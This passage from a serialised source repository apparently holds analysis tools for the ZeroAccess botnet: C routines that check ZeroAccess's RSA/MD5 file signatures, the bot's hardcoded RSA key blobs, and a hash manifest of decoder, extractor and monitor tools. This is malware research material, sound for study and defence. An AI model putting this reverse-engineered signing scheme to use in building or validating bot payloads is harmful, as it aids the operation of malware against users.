FALSE;\n\tLDR_RESOURCE_INFO resInfo;\n\n\tphdr = (PIMAGE_NT_HEADERS32)RtlImageNtHeader(Image);\n\twhile (phdr != NULL) {\n\n\t\tresInfo.Type = (ULONG_PTR)RT_RCDATA; //type\n\t\tresInfo.Name = 1; //id\n\t\tresInfo.Lang = 0; //lang\n\n\t\tp_resource_sign = SfLdrQueryResourceDataEx(Image, &resInfo, &SignSize);\n\t\tif (p_resource_sign == NULL)\n\t\t\tbreak;\n\n\t\tif (SignSize != 128)\n\t\t\tbreak;\n\n\t\tif (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &lh_hash))\n\t\t\tbreak;\n\n\t\tCRC = phdr->OptionalHeader.CheckSum;\n\n\t\tmemcpy(e_sign, p_resource_sign, sizeof(e_sign));\n\t\tmemset(p_resource_sign, 0, sizeof(e_sign));\n\n\t\tphdr->OptionalHeader.CheckSum = 0;\n\n\t\tMD5Update(ctx, Image, ImageSize);\n\n\t\tphdr->OptionalHeader.CheckSum = CRC;\n\t\tmemcpy(p_resource_sign, e_sign, sizeof(e_sign));\n\n\t\tMD5Final(ctx);\n\n\t\tif (!CryptSetHashParam(lh_hash, HP_HASHVAL, (const BYTE *)&ctx->digest, 0)) {\n\t\t\tCryptDestroyHash(lh_hash);\n\t\t\tbreak;\n\t\t}\n\n\t\tbResult = CryptVerifySignatureW(lh_hash, (const BYTE *)&e_sign, sizeof(e_sign), hKey, 0, 0);\n\t\tCryptDestroyHash(lh_hash);\n\t\tbreak;\n\t}\n\treturn bResult;\n}\n\n/*\n* SfcIsFileLegit\n*\n* Purpose:\n*\n* Verify file to be legit ZeroAccess signed binary.\n*\n* Verification algorithm (as for current version)\n*\n* 1. Open dll file, read it to the allocated buffer, read extended attribute VER, \n* containing retL packet data regarding file FileName, TimeStamp, FileSize, \n* Signature (unusued in this verification);\n*\n* 2. Import required RSA key (hardcoded in the bot);\n* \n* 3. Calc MD5 for FileName+TimeStamp+FileSize values;\n* \n* 4. Find resource [1] in dll file, which is embedded signature used to check;\n*\n* 5. Remember PE header CRC value, set it to zero in PE file buffer;\n* \n* 6. Copy embedded signature [1] to preallocated buffer, zero it in PE file buffer;\n*\n* 7. Update MD5 for PE file buffer (excluding PE CRC and signature);\n*\n* 8. Use result MD5 as hash value; \n*\n* 9. Verify embedded signature.\n*\n* If anything from the above fail - file is not legit by ZeroAccess opinion.\n*\n* If you copy ZeroAccess downloaded files without copying EA data, it cannot be verified.\n*\n*/\nNTSTATUS SfcIsFileLegit(\n\t_In_ LPWSTR lpFileName,\n\t_In_ PBYTE BotKey,\n\t_In_ DWORD BotKeySize\n\t)\n{\n\tBOOL cond = FALSE;\n\tPVOID pBuffer;\n\tMD5_CTX context;\n\tZA_FILEHEADER zaHeader;\n\tHCRYPTPROV lh_prov = 0;\n\tHCRYPTKEY lh_key = 0;\n\tHANDLE hFile = NULL;\n\tNTSTATUS status = STATUS_UNSUCCESSFUL;\n\tOBJECT_ATTRIBUTES ObjectAttributes;\n\tIO_STATUS_BLOCK IoStatusBlock;\n\tUNICODE_STRING usFileName;\n\tSIZE_T memIO = 0;\n\n\tif (\n\t\t(lpFileName == NULL) ||\n\t\t(BotKey == NULL) ||\n\t\t(BotKeySize == 0)\n\t\t)\n\t{\n\t\treturn status;\n\t}\n\n\n\tRtlSecureZeroMemory(&usFileName, sizeof(usFileName));\n\n\tdo {\n\n\t\tif (RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL) == FALSE)\n\t\t\tbreak;\n\n\t\tInitializeObjectAttributes(&ObjectAttributes, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\t\tstatus = NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, &IoStatusBlock,\n\t\t\tFILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n\t\t\tFILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT\n\t\t\t);\n\n\t\tif (!NT_SUCCESS(status))\n\t\t\tbreak;\n\n\t\tRtlFreeUnicodeString(&usFileName);\n\n\t\tRtlSecureZeroMemory(&zaHeader, sizeof(zaHeader));\n\t\tif (!SfNtfsQueryFileHeaderFromEa(hFile, &zaHeader)) {\n\t\t\tstatus = STATUS_EA_LIST_INCONSISTENT;\n\t\t\tbreak;\n\t\t}\n\n\t\tstatus = STATUS_UNSUCCESSFUL;\n\t\tmemIO = zaHeader.Size;\n\t\tpBuffer = NULL;\n\t\tif (\n\t\t\t(NT_SUCCESS(NtAllocateVirtualMemory(NtCurrentProcess(), &pBuffer, 0, &memIO, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE))) &&\n\t\t\t(pBuffer != NULL)\n\t\t\t)\n\t\t{\n\t\t\tif (NT_SUCCESS(NtReadFile(hFile, NULL, NULL, NULL, &IoStatusBlock, pBuffer, zaHeader.Size, NULL, NULL))) {\n\t\t\t\tif (CryptAcquireContext(&lh_prov, NULL, MS_DEF_PROV, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {\n\t\t\t\t\tif (CryptImportKey(lh_prov, (const BYTE *)BotKey, BotKeySize, 0, 0, &lh_key)) {\n\t\t\t\t\t\tRtlSecureZeroMemory(&context, sizeof(context));\n\t\t\t\t\t\tMD5Init(&context);\n\t\t\t\t\t\tMD5Update(&context, (UCHAR*)&zaHeader, (UINT)3 * sizeof(ULONG)); //note: ZA_FILEHEADER without signature\n\t\t\t\t\t\tif (SfcVerifyFile(lh_prov, lh_key, &context, pBuffer, zaHeader.Size))\n\t\t\t\t\t\t\tstatus = STATUS_SUCCESS;\n\n\t\t\t\t\t\tCryptDestroyKey(lh_key);\n\t\t\t\t\t}\n\t\t\t\t\tCryptReleaseContext(lh_prov, 0);\n\t\t\t\t}\n\t\t\t}\n\t\t\tmemIO = 0;\n\t\t\tNtFreeVirtualMemory(NtCurrentProcess(), &pBuffer, &memIO, MEM_RELEASE);\n\t\t}\n\t\tNtClose(hFile);\n\t\thFile = NULL;\n\n\t} while (cond);\n\n\tif (hFile != NULL) NtClose(hFile);\n\n\tif (usFileName.Buffer != NULL) {\n\t\tRtlFreeUnicodeString(&usFileName);\n\t}\n\treturn status;\n}\n\n/*\n* SfcValidateFileHeader\n*\n* Purpose:\n*\n* Verify fileheader from retL packet.\n*\n*/\nBOOL SfcValidateFileHeader(\n\t_In_ HCRYPTPROV hCryptoProv,\n\t_In_ HCRYPTKEY hCryptKey,\n\t_In_ ZA_FILEHEADER *FileHeader\n\t)\n{\n\tBOOL bResult, cond = FALSE;\n\tHCRYPTHASH hCryptHash = 0;\n\tMD5_CTX ctx;\n\n\tbResult = FALSE;\n\n\tif (FileHeader == NULL)\n\t\treturn FALSE;\n\n\tdo {\n\n\t\tif (!CryptCreateHash(hCryptoProv, CALG_MD5, 0, 0, &hCryptHash))\n\t\t\tbreak;\n\n\t\tMD5Init(&ctx);\n\t\tMD5Update(&ctx, (UCHAR*)FileHeader, (UINT)3 * sizeof(ULONG));\n\t\tMD5Final(&ctx);\n\n\t\tif (!CryptSetHashParam(hCryptHash, HP_HASHVAL, (const BYTE *)&ctx.digest, 0))\n\t\t\tbreak;\n\t\t\n\t\tbResult = CryptVerifySignatureW(hCryptHash, (const BYTE *)&FileHeader->Signature, sizeof(FileHeader->Signature), hCryptKey, 0, 0);\n\n\t} while (cond);\n\n\tif (hCryptHash != 0) {\n\t\tCryptDestroyHash(hCryptHash);\n\t}\n\treturn bResult;\n}\n"
},
{
"path": "Source/shared/za_crypto.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: ZA_CRYPTO.H\n*\n* VERSION: 1.01\n*\n* DATE: 18 Jan 2016\n*\n* ZeroAccess cryptography.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nNTSTATUS SfcIsFileLegit(\n\t_In_ LPWSTR lpFileName,\n\t_In_ PBYTE BotKey,\n\t_In_ DWORD BotKeySize\n\t);\n\nBOOL SfcValidateFileHeader(\n\t_In_ HCRYPTPROV hCryptoProv,\n\t_In_ HCRYPTKEY hCryptKey,\n\t_In_ ZA_FILEHEADER *FileHeader\n\t);\n"
},
{
"path": "Source/shared/za_rkey.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: ZA_RKEY.H\n*\n* VERSION: 1.01\n*\n* DATE: 18 Jan 2016\n*\n* ZeroAccess RSA keys.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\nstatic const BYTE ZA_key64[152] = {\n\t0x06, 0x02, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00,\n\t0x01, 0x00, 0x01, 0x00, 0xE7, 0x44, 0x50, 0xDA, 0x57, 0xDA, 0x0C, 0x36, 0xA1, 0xFA, 0xE6, 0x9F,\n\t0xF1, 0x87, 0xC4, 0xFC, 0x88, 0x60, 0xAC, 0xFE, 0x94, 0x36, 0xCE, 0xD6, 0x8B, 0x3D, 0xD5, 0xD2,\n\t0xA9, 0x8A, 0xE0, 0x30, 0x30, 0x37, 0x3E, 0xC8, 0xAE, 0xDD, 0x30, 0x5B, 0xDD, 0x3A, 0x62, 0xFC,\n\t0x6D, 0x79, 0x8F, 0x58, 0x75, 0x3D, 0x83, 0x5A, 0x2F, 0x50, 0x52, 0xDA, 0xE8, 0x81, 0xE4, 0xD0,\n\t0x63, 0xB5, 0x96, 0x04, 0x4D, 0xD6, 0x89, 0x3E, 0xBD, 0x06, 0x45, 0x42, 0x34, 0x5B, 0x96, 0xF7,\n\t0x10, 0xC1, 0xFC, 0xCA, 0xA0, 0x0A, 0xA9, 0x3F, 0x3A, 0x1F, 0xD0, 0x9E, 0xFE, 0xE2, 0x91, 0x8F,\n\t0x13, 0xCC, 0xF2, 0x57, 0xB7, 0x90, 0x9F, 0xFA, 0xE3, 0x2B, 0xC4, 0x69, 0x4B, 0xC6, 0xA2, 0x21,\n\t0x5C, 0x99, 0xC1, 0xD3, 0x43, 0x44, 0x30, 0x0D, 0xD8, 0xEB, 0xED, 0x9A, 0x65, 0x4D, 0x99, 0x33,\n\t0x57, 0x93, 0x1A, 0xFA, 0x00, 0x00, 0x00, 0x00\n};\n\nstatic const BYTE ZA_key32[152] = {\n\t0x06, 0x02, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00,\n\t0x01, 0x00, 0x01, 0x00, 0xA9, 0x60, 0x94, 0x60, 0xE1, 0x74, 0x92, 0x3A, 0xD6, 0xB9, 0x2A, 0x60,\n\t0x7E, 0x89, 0x98, 0x29, 0x57, 0x16, 0x01, 0x89, 0x25, 0x36, 0x3B, 0x99, 0xF3, 0x51, 0xB6, 0xF9,\n\t0xFF, 0xD7, 0x2C, 0x2F, 0x1E, 0x98, 0x3B, 0x4E, 0x5E, 0x4A, 0x1B, 0x39, 0x1E, 0x90, 0x97, 0x3B,\n\t0x48, 0x71, 0x12, 0x4C, 0x74, 0xED, 0xC4, 0x1F, 0xBE, 0xDE, 0xDA, 0x03, 0x9F, 0xC4, 0x0B, 0x66,\n\t0x52, 0xEF, 0xBD, 0xBD, 0xEA, 0x7F, 0x1F, 0xE2, 0xB2, 0x64, 0xC9, 0x08, 0x97, 0xD3, 0x8C, 0x97,\n\t0xA0, 0xEE, 0xC8, 0x28, 0xB1, 0x1A, 0xDD, 0x46, 0xBB, 0x7D, 0x01, 0xD1, 0x55, 0x7D, 0xB8, 0xE2,\n\t0x4B, 0x9B, 0xFE, 0x66, 0x58, 0xBA, 0x9C, 0x18, 0x58, 0x48, 0xAA, 0xAA, 0x69, 0xFD, 0x3E, 0xE6,\n\t0xA6, 0x83, 0x25, 0xDA, 0x18, 0xA3, 0x43, 0xAC, 0x49, 0x0A, 0xA2, 0x7B, 0xAC, 0x98, 0xFC, 0x25,\n\t0xF7, 0x94, 0xB2, 0xB0, 0x00, 0x00, 0x00, 0x00\n};\n"
},
{
"path": "ZeroAccess.sha256",
"content": "6edc20cbc4c8464edaf25c70a3acdc72badd80428007d9393dfb5475944d2bd6 *Compiled\\s32\n7d9291fbd5ba96ede386e688584a6f873615a141a5363d4431499de5415c02c4 *Compiled\\s64\ndf0ad45b2b69ba4e18802d83fce48c07a2e16e92278299c7eaf2b1678d0b63aa *Compiled\\zacheck32.exe\na95902a4c3deb322e5cff577139cdeb46c89c7d3c1afcf7ed58951cc26211ecc *Compiled\\zacheck64.exe\n8482fc34c87b98e5b7f22ecd3a4de93837dff0b63b5024606d66447569940a39 *Compiled\\zadecode32.exe\nd2b7edf777ea0e042e4fe59f4922258b103a7b8a0f92c71e28a871e947a9333c *Compiled\\zadecode64.exe\n36261ed415e5cedd3a7895e74ba48635d3e38ca9751da3deec25697291ac93c1 *Compiled\\zadecrypt32.exe\n71aca48f0d654d94bc79ee74ae009cb36776de52d7bfba8ab8b5e2233a2e6648 *Compiled\\zadecrypt64.exe\ncfe20548e1545619973bddfc6f2082e343e2cc92c8beebfb153fda95abcbce06 *Compiled\\zaextract32.exe\n6e6bd7a64c616efcbf675009b0728432dbe39fcbf063f36d1462e214ecddc52b *Compiled\\zaextract64.exe\n6519f0a04666746c526c758ef832ff0021cdabd6fa662ca9a843dbb51563cca5 *Compiled\\zamon32.exe\n1507ce3e928351015717b7213d4fe599b01d3bf3cd77538ed58ee838173cf03d *Compiled\\zamon64.exe\n0015887395212c66210d7d09676b9e3e04e74359ae886ad5baaff98698730f08 *Source\\ZeroAccess.sln\n279ad15e62aca033118024d43df517215707a0c2f06203c1b29fb3615a1e18b0 *Source\\Harusame\\Harusame.vcxproj\n8a2d830a9469a66971dc238ebec6c6772f70f64c64790831aef5cc6ee9387a02 *Source\\Harusame\\Harusame.vcxproj.filters\ndcf6405d3f885bac4bb25927ce3138d88cae444102bfd6215a277e30c3b8451d *Source\\Harusame\\Harusame.vcxproj.user\nf842dff26f6f412c6eb3396c2820803dc12feacf09073f1d66bcb52c48baa482 *Source\\Harusame\\main.c\nd1130a87d31c6f62387dcfd5ce1449a68c8dad2bc62674d1cc887804758615ae *Source\\Harusame\\resource.h\n3bfbf731c6efc6d3f06c399a75b2564acea950ae7f598e77a9117a06ea11d66b *Source\\Harusame\\resource.rc\n893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\\minirtl\\cmdline.c\nbd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\\minirtl\\cmdline.h\nbbe951dca057e514341236e2b3b5bcbd36b156f2ffeb5747e1410957cd7c035f *Source\\minirtl\\hextou64.c\nb19cfccca84c1f6e504fed934926905961fe14f9b0db6c5aad4b05687f69e10d *Source\\minirtl\\hextoul.c\nb655f303a1a5d96d781efa2d0fc397c788573cf9a8b16197548a38beab287fe7 *Source\\minirtl\\i64tostr.c\n118bc8a4ee8b865634dba843d1b571b0a1c2f658163a969143e39d572faa05a8 *Source\\minirtl\\itostr.c\n107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\\minirtl\\minirtl.h\nb9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\\minirtl\\rtltypes.h\nca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\\minirtl\\strtoi.c\ne16e3e2b02faac668a677d05cb03732548c3149058d74c3f0d285cf1cdfed30f *Source\\minirtl\\strtoi64.c\n0320808115d42f04f63a382e8f386aa9bc77ba879892f5ccc94c40378b5131c8 *Source\\minirtl\\strtou64.c\nf4763588a79859ba8a84e3be35fa1e4b0b8bf95f547a4fee5ae4612978c0787b *Source\\minirtl\\strtoul.c\ne56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13 *Source\\minirtl\\u64tohex.c\n4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5 *Source\\minirtl\\u64tostr.c\nf81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107 *Source\\minirtl\\ultohex.c\n9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\\minirtl\\ultostr.c\nc1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6 *Source\\minirtl\\_filename.c\n9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519 *Source\\minirtl\\_filename.h\n83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52 *Source\\minirtl\\_strcat.c\n2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1 *Source\\minirtl\\_strcmp.c\nef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\\minirtl\\_strcmpi.c\n969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8 *Source\\minirtl\\_strcpy.c\n27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\\minirtl\\_strend.c\n60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\\minirtl\\_strlen.c\n97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94 *Source\\minirtl\\_strncmp.c\n87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\\minirtl\\_strncmpi.c\n0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\\minirtl\\_strncpy.c\n52e3d39c69c43264b2f8d9bcdfce0f763a5e92d091eef59ea2a0294b4b19641c *Source\\minirtl\\_strstr.c\n52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6 *Source\\minirtl\\_strstri.c\nf63b37c55e3086e0db50d27232011dec8a018ea45f4cd0ebdec8b109469c8549 *Source\\Murasame\\main.c\n31a64a269824358de963aaf8c64377397e54809f4900b46d6441b9c89f5d424f *Source\\Murasame\\Murasame.vcxproj\n5a2475045ba2053e23a634b137134a4f67eb5e18914e4fc66bbac16aa6256150 *Source\\Murasame\\Murasame.vcxproj.filters\n392f302c455b6e933f5c80e0fd99026f41b3ae96cf244dd3aa473de77273374d *Source\\Murasame\\Murasame.vcxproj.user\nd1130a87d31c6f62387dcfd5ce1449a68c8dad2bc62674d1cc887804758615ae *Source\\Murasame\\resource.h\n82ff9b73d6ad047a65157ae2e91185559e0a82c339f68c031a98be40ae173002 *Source\\Murasame\\resource.rc\n0075040c1cf2ecbf1a3130f96ef17ae2876f9f933f1dbc05813eb64e005f27ba *Source\\shared\\cab.c\n50536ffaecee17900544a7eb747788d922f675b3656be4fb8d95c52ee1b0b984 *Source\\shared\\cab.h\n87783b4382e00df6fff7c960c1e6ca220666d8affc3edf4978fcb4adb576d3f2 *Source\\shared\\cui.c\n38f18a878b42ea1dc495374e325c767921a5814201f90bd0523f7bb10cf50229 *Source\\shared\\cui.h\nc22606eccf0375dd875354b110dd45438fe0ae37f556ef8e218db4af9a9bb84c *Source\\shared\\ea.c\n8272221dd05a2991a3c0536cdcf2025df29836e4d7fafce99fd7def86cf83365 *Source\\shared\\ea.h\nbe2851a70758e1aeb69a034bc6337c89cd228732ead7f2ea3ff17b69f30cdc25 *Source\\shared\\gdip.c\n5775d2b9102fddddc421d64bc4360330eb851c5eb518a03e62408f74ac4fe358 *Source\\shared\\gdip.h\n0c543c967c66156217897cd530be5dc7953bde7e852279de8d755ed9bec3ccc0 *Source\\shared\\global.h\n83351031169e0d7f98cc18de06562198e9d50d2638e425bb3c6967a91713a689 *Source\\shared\\ldr.c\nfb1c15a5b524f2cb741385d0930fb2bdc56ceed0f4aee0671673f74b716e896c *Source\\shared\\ldr.h\n1ca1a30a30ae0afe8e7c2975c9b6c99296300185835b1dd2286adf79bd68e454 *Source\\shared\\md5.c\n0658356239e3e9c1fcb2c7d21ae4161138cd904cbd76d7510edb6279bea7acce *Source\\shared\\md5.h\n5310406f9baf7602ee4e98a03f968567786a92c068810c3c1d3c158e966ab2a0 *Source\\shared\\ntos.h\n14c288519553454e51c894717f63dc4ee5daa215d0095f690d9cf5113ed4de98 *Source\\shared\\rc4.c\n1d248ac5211f645289cd6344b5f4cdce0ff2548be0c7eb0272089cb46fc4912a *Source\\shared\\rc4.h\nb595e949aa45f2b2d287de3731e744668a940c7b061611f1ece6e8d080a83002 *Source\\shared\\util.c\naf8ae04e2b7ef946cc0c1ba6f49c7292521ea2c1da75624d32b167a675c1c1a0 *Source\\shared\\util.h\n756732ca81810e7b33b30635fd7324f288d264be932e53ac197d0721ae37ddc7 *Source\\shared\\za.h\n02fe6291d1d1aa1bbcc47734ee4f376214dec03a00246bcb8749eb1c50ed05d9 *Source\\shared\\za_crypto.c\n56bb0477d52d6e94c1833c6b1ef1e742ef4502dfd570bffdffe44a66cf79a10a *Source\\shared\\za_crypto.h\n7be298f6353d1de53010e409a351732d879dbed9e6a94f36361000e1e2536967 *Source\\shared\\za_rkey.h\n78bde6c3750b3e518806eaa267a74d392bc362178a0c9d77e97b32a3a934ed82 *Source\\Shigure\\main.c\nd1130a87d31c6f62387dcfd5ce1449a68c8dad2bc62674d1cc887804758615ae *Source\\Shigure\\resource.h\n0c1f96fea162d97aea542f633412ba264501836532cdbe8e5b1d4c23749d9309 *Source\\Shigure\\resource.rc\need2833a9e6af80427072a023cb1ac1d37147ca821ca6bc89718da79f39ffb50 *Source\\Shigure\\Shigure.vcxproj\n73d1d35a86ffd7e8071b8284073c9c437d1210d5957aeb70331c0855d67a7486 *Source\\Shigure\\Shigure.vcxproj.filters\n17a15fad6aae04393b8be0a306147c9f443788a1eaccfd752cb51f23d1bf7fa1 *Source\\Shigure\\Shigure.vcxproj.user\ndf6d3c62c30bb2275ec14ca1a41a67f88874e8dfc2e7c99f982a3dee99715bd0 *Source\\Umikaze\\main.c\nd1130a87d31c6f62387dcfd5ce1449a68c8dad2bc62674d1cc887804758615ae *Source\\Umikaze\\resource.h\n0a711e352ec0f4e6a428f2e53584921456f222ad33b91c819edc9532c6d29fbe *Source\\Umikaze\\resource.rc\n098c56ab09e1c3df5a1f74d14ab0f482c38469e4267bbcd491042cd5f0a6fa88 *Source\\Umikaze\\Umikaze.vcxproj\n0be1663720ef15b63eb80024060c91b0fc9956263f4e127d7a7a91a069f58cc5 *Source\\Umikaze\\Umikaze.vcxproj.filters\n17a15fad6aae04393b8be0a306147c9f443788a1eaccfd752cb51f23d1bf7fa1 *Source\\Umikaze\\Umikaze.vcxproj.user\n014daa7f0364c1c8f00af79ecd1499e3fab9dffce64e95493fc75219aed9a630 *Source\\Yuudachi\\gui.c\n5c1861a4791bc3c57cf466a9ce57353ac2b76f0e960ef3f94e3e6177fa7c603f *Source\\Yuudachi\\gui.h\n73f16c33844a07b4a406be33fa6df293b5012e75aaff3816956dabcad9818dda *Source\\Yuudachi\\main.c\n27e5a4fa196ee42075a7988f56c59ca6e1dfdbcfd61115d3265d14b6b319ee8a *Source\\Yuudachi\\p2p.c\n55dcd8beeb6141d8d571c4223ebc911be886207a2f280960449df5fd91c57363 *Source\\Yuudachi\\p2p.h\nd62f46b187f81682962b947f372e6cfbfa660605b4ae45471b58ae40ad93556a *Source\\Yuudachi\\resource.h\ne2903c8ece144f5d326c341ebc92b1e443f665d3ffbbca150bc3245a43200c79 *Source\\Yuudachi\\resource.rc\n18384ac6c3d0baaeb75fae068d47c0d86339ec6301bb407d18add4b3ea271af2 *Source\\Yuudachi\\Yuudachi.vcxproj\nde0fde0d4da8274eba1510f39995142c1a3e235f9480e7f66ae0e500f0d9845e *Source\\Yuudachi\\Yuudachi.vcxproj.filters\n9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\\Yuudachi\\Yuudachi.vcxproj.user\n366d79215afaf7e3dd82065f0775f87f769a51b53b184c3e8cb4097e1076d1d1 *Source\\Yuudachi\\za.manifest\n"
}
]